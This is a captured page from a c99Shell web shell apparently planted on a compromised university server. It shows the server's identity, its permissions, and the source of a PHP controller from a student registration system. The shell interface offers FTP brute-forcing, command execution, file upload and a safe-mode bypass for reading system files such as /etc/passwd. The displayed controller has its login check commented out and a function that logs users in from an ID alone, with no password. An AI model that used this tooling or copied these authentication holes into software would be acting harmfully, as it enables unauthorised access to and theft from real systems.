!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/controllers/   drwxrwxrwx
Free 51.23 GB of 127.8 GB (40.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     my_controller.php (6.27 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php 
/**
 * System in Educational Enterprise Resource Planning System
 *
 * LICENSE
 *
 * This source file is subject to the GPL license that is bundled
 * with this package in the file licence.txt.
 *
 * @package        System in Educational Enterprise Resource Planning System
 * @subpackage    Registration System
 * @copyright      Copyright (C) 2011 by Information System Engineering Research Labolatory, Burapha University
                http://iserl.buu.ac.th
                iserl.callcenter@gmail.com
 * @license        http://cvs.buu.ac.th/mis/license.php GNU GPL v1
 * @author         Information System Engineering Research Labolatory, Burapha University
 *
 *
 */
class My_controller extends CI_Controller {

    public 
$body;
    public 
$mmn;

    public function 
__construct()
    {
        
parent::__construct();
        
$this->load->library('session');
        
$this->body '';
        
/*if (!$this->session->userdata('logged_in'))
        {
            redirect('/login');
        }*/
        /*else {
            $uri = uri_string();
            $uo_id =  $this->session->userdata('useroffId');
            //echo "$uo_id , $uri";
            $this->load->model('m_ad_user_officer','uf');
            $result = $this->uf->checkMenu($uo_id,$uri);
            if(!$result){
               redirect('officer/unAuthorize');
            }
            
        }*/
    
}

    function 
setCRUD($UsID,$gpid,$mnid){
        
$this->load->model('ums/m_umpermission','');
        
$this->load->model('ums/m_umgpermission','');

        
$X 1;
        
$C 1;
        
$R 1;
        
$U 1;
        
$D 1;
        
$oUp $this->m_umpermission->SearchByKey($UsID$mnid);

        if (
$oUp){
            
$X $oUp['pmX'];
            
$C $oUp['pmC'];
            
$R $oUp['pmR'];
            
$U $oUp['pmU'];
            
$D $oUp['pmD'];
        } else {
            
$oGp $this->m_umgpermission->SearchByKey($gpid$mnid);
            if (
$oGp){
                
$X $oGp['gpX'];
                
$C $oGp['gpC'];
                
$R $oGp['gpR'];
                
$U $oGp['gpU'];
                
$D $oGp['gpD'];
            }
        }

        
$data = array(    'X' => $X,
                    
'C' => $C,
                    
'R' => $R,
                    
'U' => $U,
                    
'D' => $D);
        
$this->session->set_userdata($data);

        return 
0;
    }

    function 
show() {
        
$UsID $this->session->userdata('UsID');
        
$gpid $this->session->userdata('GpID');
        
$stid $this->session->userdata('StID');
        
$mnid $this->session->userdata('MnID');
        if(
$this->session->userdata('MnID')){
            
$this->setCRUD($UsID,$gpid,$mnid);
        }

        if(
$this->session->userdata('logged_in')){
            
$data ='';
            if(
$this->session->userdata('StID')){
                
$this->load->model('ums/m_ummenu','');
                
$data['mmn']= $this->m_ummenu->RSByStIDGpIDUsIDPrIDLv($stid,$gpid,$UsID,0,0);
                if(
$this->session->userdata('MnID')){
                    
$data['history'] = $this->menuHistory($this->session->userdata('MnID'));
                }
            }
            
$mn['menu'] = $this->load->view('info/v_postlogin',$data,true);
            
$lv['body'] = $this->body;
            
$lv['blog'] = (isset($this->blog)) ? $this->blog '';
        }else{
            
$mn['menu'] = $this->load->view('info/v_prelogin','',true);
            
$lv['body'] = $this->load->view('info/v_info','',true);
        }

        
$lv['head'] = $this->load->view('info/v_header',$mn,true);

        
$lv['footer'] = $this->load->view('info/v_footer','',true);

        
$this->load->view('info/v_in',$lv);
    }

    function 
showPopup() {
        
$mn '';
        
$lv['head'] = $this->load->view('info/v_headerPopup',$mn,true);
        
$lv['body'] = $this->body;
        
$lv['footer'] = $this->load->view('info/v_footerPopup','',true);;

        
$this->load->view('info/v_in',$lv);
    }

    function 
genMn(){

        
$stid $this->session->userdata('StID');
        
$gpid $this->session->userdata('GpID');
        
$UsID $this->session->userdata('UsID');

        
$this->load->model('ums/m_ummenu','');
        
$rs $this->m_ummenu->RSByStIDGpIDUsIDPrIDLv($stid,$gpid,$UsID,0,0);

        return 
$rs;
    }

    function 
menuHistory($MnID){
        
$his "";
        
$this->load->model('ums/m_ummenu','m1');
        
$qry $this->m1->getByKey($MnID);
        
$rs $qry->row();

        if(
$qry->num_rows()) {

            
$rs $qry->row();

            if(
$rs->MnParentMnID>0){
                
$ret $this->menuHistory($rs->MnParentMnID);
                
//$img = "<img src=\"".base_url()."images/submenu_mini.gif\" align='absmiddle' border='0'> ";
                
$img ' » ';
                if(
$rs->MnURL != '')
     
$his.=$ret.$img."<span onclick=\"doSubmitMn(".$rs->MnStID.",".$rs->MnID.")\" onmouseover=\"this.style.cursor='pointer';this.style.color = '#0066FF';\" onmouseout=\"this.style.color = '#000000';\">".$rs->MnNameT."</span>";
    
//                $his.=$ret." $img <a href=\" ".site_url()."info/info/submenu/$rs->MnStID/$rs->MnID\">$rs->MnNameT</a>";

                
else
                    
$his.=$ret." $img $rs->MnNameT";
                
//$his.=$ret." $img <a href=\" ".site_url()."info/info/submenu/$rs->MnStID/$rs->MnID\">$rs->MnNameT</a>";
            
}else{
                
$img "<img src=\"".base_url()."images/sysgrp_mini.gif\" align='absmiddle' border='0'> ";
    
//            $his = "$img <a href=\" ".site_url()."info/info/submenu/$rs->MnStID/$rs->MnID\">$rs->MnNameT</a> ";
     
$his.=$img."                <span onclick=\"doSubmitMn(".$rs->MnStID.",".$rs->MnID.")\" onmouseover=\"this.style.cursor='pointer';this.style.color = '#0066FF';\" onmouseout=\"this.style.color = '#000000';\">".$rs->MnNameT."</span>";

            }
        }
        return 
$his;
    }
    function 
loginByPsId ($stid=""$gpid=""$ps_id="") {
        
$this->load->model('ums/m_umuser','obj');
        
$rs $this->obj->checkUserByPsId($ps_id);
        if (
$rs) {
            
$data = array('UsID' => $rs['UsID'],
                            
'UsName' => $rs['UsName'],
                            
'UsLogin' => $rs['UsLogin'],
                            
'UsPsCode' => $rs['UsPsCode'],
                            
'UsWgID' => $rs['UsWgID'],
                            
'logged_in' => TRUE);
            
$this->session->set_userdata($data);
            
redirect('/info/info/mainMenu/'.$stid.'/'.$gpid);
        } else {
            
$this->session->set_flashdata('message''<div id="message" align="center"><font color="red">ชื่อเข้าใช้งานหรือรหัสผ่านผิดพลาด</font></div>');
            
redirect('info/info');
        }
    }

}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0065 ]--